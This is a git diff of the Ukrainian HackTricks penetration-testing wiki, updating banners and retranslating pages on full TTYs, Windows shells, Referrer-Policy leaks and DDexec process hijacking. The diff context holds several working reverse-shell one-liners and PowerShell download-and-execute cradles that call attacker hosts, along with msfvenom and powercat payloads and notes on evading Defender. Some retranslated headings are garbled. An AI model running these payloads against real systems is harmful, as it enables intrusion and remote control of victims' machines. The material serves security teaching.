+{% endhint %} diff --git a/generic-methodologies-and-resources/shells/full-ttys.md b/generic-methodologies-and-resources/shells/full-ttys.md index 3d0617e28..111359952 100644 --- a/generic-methodologies-and-resources/shells/full-ttys.md +++ b/generic-methodologies-and-resources/shells/full-ttys.md @@ -1,22 +1,23 @@ # Повні TTY +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Школа хакінгу HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Школа хакінгу HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у PDF** Перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} ## Повний TTY -Зверніть увагу, що оболонку, яку ви встановлюєте у змінну `SHELL`, **повинна** бути **перелічена всередині** _**/etc/shells**_ або `Значення для змінної SHELL не було знайдено в файлі /etc/shells Цей випадок було повідомлено`. Також зверніть увагу, що наступні уривки працюють лише в bash. Якщо ви в zsh, переключіться на bash перед отриманням оболонки, запустивши `bash`. +Зверніть увагу, що оболонку, яку ви встановлюєте у змінну `SHELL`, **повинно** бути **перераховано всередині** _**/etc/shells**_ або `Значення для змінної SHELL не було знайдено в файлі /etc/shells Цей випадок було повідомлено`. Також зверніть увагу, що наступні уривки працюють лише в bash. Якщо ви в zsh, переключіться на bash перед отриманням оболонки, запустивши `bash`. #### Python @@ -99,7 +100,7 @@ certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/d reverse-ssh.exe -p 4444 kali@10.0.0.2 ``` -* Якщо запит на зворотнє перенаправлення порту ReverseSSH був успішним, ви тепер повинні мати можливість увійти за допомогою пароля за замовчуванням `letmeinbrudipls` в контексті користувача, який запускає `reverse-ssh(.exe)`: +* Якщо запит на перенаправлення порту ReverseSSH був успішним, ви тепер повинні мати можливість увійти за допомогою пароля за замовчуванням `letmeinbrudipls` в контексті користувача, який запускає `reverse-ssh(.exe)`: ```bash # Interactive shell access ssh -p 8888 127.0.0.1 @@ -113,16 +114,17 @@ sftp -P 8888 127.0.0.1 ```bash expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "";send "\r\n";interact' ``` +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Школа взлому AWS для Червоної Команди (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Школа взлому GCP для Червоної Команди (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/generic-methodologies-and-resources/shells/windows.md b/generic-methodologies-and-resources/shells/windows.md index bce081c8a..5dac34529 100644 --- a/generic-methodologies-and-resources/shells/windows.md +++ b/generic-methodologies-and-resources/shells/windows.md @@ -1,18 +1,19 @@ # Оболонки - Windows +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub.** +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} **Група з безпеки Try Hard** @@ -24,8 +25,8 @@ ## Lolbas -Сторінка [lolbas-project.github.io](https://lolbas-project.github.io/) призначена для Windows, як [https://gtfobins.github.io/](https://gtfobins.github.io/) для Linux.\ -Очевидно, **в Windows немає файлів SUID або привілеїв sudo**, але корисно знати, **як** деякі **виконувані файли** можуть бути (зловживані), щоб виконати деякі неочікувані дії, наприклад **виконати довільний код.** +Сторінка [lolbas-project.github.io](https://lolbas-project.github.io/) призначена для Windows, як [https://gtfobins.github.io/](https://gtfobins.github.io/) для linux.\ +Очевидно, **в Windows немає файлів SUID або привілеїв sudo**, але корисно знати, **як** деякі **виконувані файли** можуть бути (зловживані), щоб виконати деякі неочікувані дії, такі як **виконання довільного коду.** ## NC ```bash @@ -33,7 +34,7 @@ nc.exe -e cmd.exe ``` ## SBD -**[sbd](https://www.kali.org/tools/sbd/) - це переносний та безпечний аналог Netcat**. Працює на системах подібних до Unix та Win32. З такими функціями, як потужне шифрування, виконання програм, налаштовані вихідні порти та постійне перепідключення, sbd надає універсальне рішення для TCP/IP-комунікації. Для користувачів Windows версію sbd.exe з дистрибутиву Kali Linux можна використовувати як надійну заміну Netcat. +**[sbd](https://www.kali.org/tools/sbd/) - це переносний та безпечний аналог Netcat**. Він працює на системах, схожих на Unix, та Win32. З такими функціями, як міцне шифрування, виконання програм, налаштовані вихідні порти та постійне перепідключення, sbd надає універсальне рішення для зв'язку TCP/IP. Для користувачів Windows версію sbd.exe з дистрибутиву Kali Linux можна використовувати як надійну заміну Netcat. ```bash # Victims machine sbd -l -p 4444 -e bash -v -n @@ -52,35 +53,33 @@ C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('1 ``` ## Perl -Perl - це потужна мова програмування, яка часто використовується для створення шкідливих сценаріїв. +Perl (Practical Extraction and Reporting Language) - це високорівнева, інтерпретована, загального призначення мова програмування. Perl широко використовується для розробки шелів на Windows платформі. ```bash perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ``` ## Ruby - -### Ruby - -Ruby - це інтерпретована мова програмування, яка підтримує об'єктно-орієнтоване програмування. ```bash #Windows ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ``` ## Lua -Lua - це легковага, високорівнева мова програмування, яка широко використовується для вбудовування в різноманітне програмне забезпечення та ігри. Lua може бути використана для створення скриптів, а також для розширення функціональності програм. Lua-скрипти можуть бути використані для автоматизації завдань або для створення нових функцій у програмах. Lua також широко використовується у галузі інформаційної безпеки для створення шкідливих програм та експлойтів. +Lua - це легковага, високорівнева мова програмування, яка широко використовується для створення скриптів та розширення функціональності програм. Lua може бути використана для створення шкідливих сценаріїв та взаємодії з системою. ```bash lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' ``` ## OpenSSH -Атакувальник (Kali) +Зловмисник (Kali) ```bash openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate openssl s_server -quiet -key key.pem -cert cert.pem -port #Here you will be able to introduce the commands openssl s_server -quiet -key key.pem -cert cert.pem -port #Here yo will be able to get the response ``` -Жертва +### Жертва + +При взломі Windows-системи важливо встановити обмежені права жертви, щоб уникнути виявлення атаки. ```bash #Linux openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect : @@ -90,7 +89,7 @@ openssl.exe s_client -quiet -connect :|cmd.exe|openssl s_cli ``` ## Powershell -Powershell - це мова програмування та оболонка командного рядка, яка використовується для автоматизації завдань у середовищі Windows. +## Повноваження ```bash powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex" powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')" @@ -98,7 +97,7 @@ Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadStr echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile ``` Процес, що виконує мережевий виклик: **powershell.exe**\ -Навантаження записане на диск: **НІ** (_принаймні ніде, де я шукав за допомогою procmon!_) +Навантаження записане на диск: **НІ** (_принаймні ніде, де я міг знайти, використовуючи procmon!_) ```bash powershell -exec bypass -f \\webdavserver\folder\payload.ps1 ``` @@ -123,7 +122,7 @@ mshta http://webserver/payload.hta ```bash mshta \\webdavserver\folder\payload.hta ``` -#### **Приклад зворотньої оболонки hta-psh (використовуйте hta для завантаження та виконання PS backdoor)** +#### **Приклад зворотньої оболонки hta-psh (використовуйте hta для завантаження та виконання PS задньої двері)** ```xml ``` @@ -311,7 +310,7 @@ impacket-smbserver -smb2support kali `pwd` ## **MSIExec** -Атакуючий +Зловмисник ``` msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi python -m SimpleHTTPServer 80 @@ -350,7 +349,7 @@ var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object N ``` cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml" ``` -Ви можете використати цю техніку, щоб обійти білістинг додатків та обмеження Powershell.exe. Вас буде запрошено на оболонку PS.\ +Ви можете використати цю техніку для обходу білого списку додатків та обмежень Powershell.exe. Оскільки вас буде запрошено ввести оболонку PS.\ Просто завантажте це та виконайте: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj) ``` C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj @@ -397,7 +396,7 @@ odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt} ``` Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444 ``` -Почніть обслуговування скрипта на веб-сервері та виконайте його на стороні жертви: +Почніть обслуговувати скрипт на веб-сервері та виконайте його на кінцевому пристрої жертви: ``` powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex" ``` @@ -409,15 +408,15 @@ Defender не виявляє його як зловмисний код (на д [**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat) -Завантажте, запустіть веб-сервер, запустіть слухача та виконайте його на кінці жертви: +Завантажте, запустіть веб-сервер, запустіть слухача та виконайте його на кінцевому пристрої жертви: ``` powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" ``` -Defender не виявляє його як зловмисний код (ще не 3/04/2019). +Defender не виявляє його як зловмисний код (поки що, 3/04/2019). **Інші опції, запропоновані powercat:** -Прив'язати оболонки, Зворотні оболонки (TCP, UDP, DNS), Перенаправлення портів, завантаження/завантаження, Генерування вантажів, Сервірування файлів... +Прив'язка оболонок, Зворотня оболонка (TCP, UDP, DNS), Перенаправлення портів, завантаження/завантаження, Генерація вантажів, Сервірування файлів... ``` Serve a cmd Shell: powercat -l -p 443 -e cmd @@ -438,17 +437,17 @@ powercat -l -p 443 -i C:\inputfile -rep [https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire) -Створіть запускач PowerShell, збережіть його у файлі, завантажте та виконайте. +Створіть запускач powershell, збережіть його у файлі, завантажте та виконайте. ``` powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" ``` -**Виявлено як шкідливий код** +**Виявлено як зловмісний код** ### MSF-Unicorn [https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn) -Створіть версію powershell зловмисного коду metasploit, використовуючи unicorn +Створіть версію powershell задньої двері metasploit за допомогою unicorn ``` python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443 ``` @@ -464,7 +463,7 @@ powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex" ## Більше -[PS>Attack](https://github.com/jaredhaight/PSAttack) PS консоль з попередньо завантаженими деякими образливими PS модулями (шифрованими)\ +[PS>Attack](https://github.com/jaredhaight/PSAttack) PS консоль з попередньо завантаженими деякими образливими PS модулями (зашифровано)\ [https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\ WinPWN](https://github.com/SecureThisShit/WinPwn) PS консоль з деякими образливими PS модулями та виявленням проксі (IEX) @@ -484,16 +483,17 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS консоль з деяк {% embed url="https://discord.gg/tryhardsecurity" %} +{% hint style="success" %} +Навчайтесь та вправляйтесь в хакінгу AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Навчайтесь та вправляйтесь в хакінгу GCP: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у PDF** Перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**Групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/interesting-http.md b/interesting-http.md index 282e38931..7aa53c189 100644 --- a/interesting-http.md +++ b/interesting-http.md @@ -1,17 +1,17 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити свою **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
- +{% endhint %} # Заголовки реферерів та політика @@ -19,11 +19,11 @@ ## Витік чутливої інформації -Якщо на веб-сторінці в який-небудь момент знаходиться чутлива інформація в параметрах запиту GET, якщо сторінка містить посилання на зовнішні джерела або зловмисник може змусити/запропонувати (соціальний інженерінг) користувача відвідати URL, керований зловмисником. Це може дозволити витік чутливої інформації в останньому запиті GET. +Якщо на веб-сторінці в якийсь момент розташована будь-яка чутлива інформація в параметрах запиту GET, якщо сторінка містить посилання на зовнішні джерела або зловмисник може змусити/запропонувати (соціальний інжиніринг) користувачеві відвідати URL, керований зловмисником. Це може дозволити витягти чутливу інформацію в останньому запиті GET. ## Пом'якшення -Ви можете змусити браузер дотримуватися **політики реферера**, яка може **запобігти** витоку чутливої інформації до інших веб-додатків: +Ви можете змусити браузер дотримуватися **політики реферера**, яка може **запобігти** відправці чутливої інформації іншим веб-додаткам: ``` Referrer-Policy: no-referrer Referrer-Policy: no-referrer-when-downgrade @@ -34,7 +34,7 @@ Referrer-Policy: strict-origin Referrer-Policy: strict-origin-when-cross-origin Referrer-Policy: unsafe-url ``` -## Протидія заходам +## Протидія-заходи Ви можете перевизначити це правило, використовуючи HTML мета-тег (зловмисник повинен використовувати HTML ін'єкцію): ```markup @@ -43,19 +43,4 @@ Referrer-Policy: unsafe-url ``` ## Захист -Ніколи не розміщуйте будь-які чутливі дані всередині параметрів GET або шляхів в URL-адресі. - - -
- -Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! - -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. - -
+Ніколи не вставляйте жодних чутливих даних у параметри GET або шляхи в URL-адресі. diff --git a/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/ddexec.md b/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/ddexec.md index 88c2dbff8..cc73fb499 100644 --- a/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/ddexec.md +++ b/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/ddexec.md @@ -1,22 +1,23 @@ # DDexec / EverythingExec +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub.** +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} ## Контекст -У Linux для запуску програми вона повинна існувати як файл, вона повинна бути доступна якимось чином через ієрархію файлової системи (це просто як працює `execve()`). Цей файл може знаходитися на диску або в оперативній пам'яті (tmpfs, memfd), але вам потрібен шлях до нього. Це дуже спрощує контроль за тим, що запускається в системі Linux, дозволяє виявляти загрози та інструменти зловмисників або запобігати їм спробувати виконати що-небудь своє (_наприклад_, не дозволяючи непривілейованим користувачам розміщувати виконувані файли де завгодно). +У Linux для запуску програми вона повинна існувати як файл, вона повинна бути доступна якимось чином через ієрархію файлової системи (це просто як працює `execve()`). Цей файл може знаходитися на диску або в оперативній пам'яті (tmpfs, memfd), але вам потрібен шлях до файлу. Це дуже спрощує контроль над тим, що запускається в системі Linux, дозволяє виявляти загрози та інструменти зловмисників або запобігати їм спробувати виконати що-небудь своє (_наприклад_, не дозволяючи непривілейованим користувачам розміщувати виконувані файли де завгодно). Але ця техніка призначена змінити все це. Якщо ви не можете запустити процес, який вам потрібен... **тоді ви захоплюєте один вже існуючий**. @@ -24,7 +25,7 @@ ## Залежності -Остаточний скрипт залежить від наступних інструментів для роботи, вони повинні бути доступні в системі, яку ви атакуєте (зазвичай ви знайдете їх скрізь): +Кінцевий скрипт залежить від наступних інструментів для роботи, вони повинні бути доступні в системі, яку ви атакуєте (зазвичай ви знайдете їх скрізь): ``` dd bash | zsh | ash (busybox) @@ -40,19 +41,19 @@ base64 ``` ## Техніка -Якщо ви можете довільно змінювати пам'ять процесу, то можете захопити його. Це можна використовувати для захоплення вже існуючого процесу та заміни його іншою програмою. Це можна досягти, використовуючи виклик системного виклику `ptrace()` (що вимагає можливості виконання системних викликів або наявності gdb в системі) або, що цікавіше, записуючи в `/proc/$pid/mem`. +Якщо ви можете довільно модифікувати пам'ять процесу, то можете захопити його. Це можна використовувати для захоплення вже існуючого процесу та заміни його іншою програмою. Ми можемо досягти цього, використовуючи виклик `ptrace()` (що вимагає можливості виконання викликів системи або наявності gdb в системі) або, що цікавіше, записуючи в `/proc/$pid/mem`. Файл `/proc/$pid/mem` є однозначним відображенням всього адресного простору процесу (наприклад, від `0x0000000000000000` до `0x7ffffffffffff000` в x86-64). Це означає, що читання або запис у цей файл за зсувом `x` те саме, що читання або зміна вмісту за віртуальною адресою `x`. -Тепер ми маємо чотири основні проблеми: +Зараз ми маємо чотири основні проблеми: -* Загалом, тільки root та власник програми файлу можуть змінювати його. +* Загалом, тільки root та власник програми файлу можуть його змінювати. * ASLR. -* Якщо ми спробуємо прочитати або записати адресу, яка не відображена в адресному просторі програми, ми отримаємо помилку вводу-виводу. +* Якщо ми спробуємо прочитати або записати за адресою, яка не відображена в адресному просторі програми, ми отримаємо помилку вводу/виводу. -Ці проблеми мають рішення, які, хоча вони не є ідеальними, є досить ефективними: +Ці проблеми мають рішення, які, хоча вони не є ідеальними, є досить хорошими: -* Більшість оболонкових інтерпретаторів дозволяють створювати файлові дескриптори, які потім будуть успадковані дочірніми процесами. Ми можемо створити fd, що вказує на файл `mem` оболонки з правами запису... тому дочірні процеси, які використовують цей fd, зможуть змінювати пам'ять оболонки. +* Більшість оболонок оболонок дозволяють створювати файлові дескриптори, які потім будуть успадковані дочірніми процесами. Ми можемо створити fd, що вказує на файл `mem` оболонки з правами запису... тому дочірні процеси, які використовують цей fd, зможуть модифікувати пам'ять оболонки. * ASLR навіть не проблема, ми можемо перевірити файл `maps` оболонки або будь-який інший з procfs, щоб отримати інформацію про адресний простір процесу. * Тому нам потрібно використовувати `lseek()` у файлі. З оболонки це не можна зробити, якщо не використовувати погано відомий `dd`. @@ -64,18 +65,18 @@ base64 * Створити вказані відображення. * Прочитати бінарні файли в них. * Налаштувати дозволи. -* Нарешті ініціалізувати стек з аргументами для програми та розмістити допоміжний вектор (необхідний завантажувачем). +* Нарешті, ініціалізувати стек з аргументами для програми та розмістити допоміжний вектор (необхідний завантажувачем). * Перейти до завантажувача та дозволити йому зробити все інше (завантажити бібліотеки, необхідні для програми). * Отримати 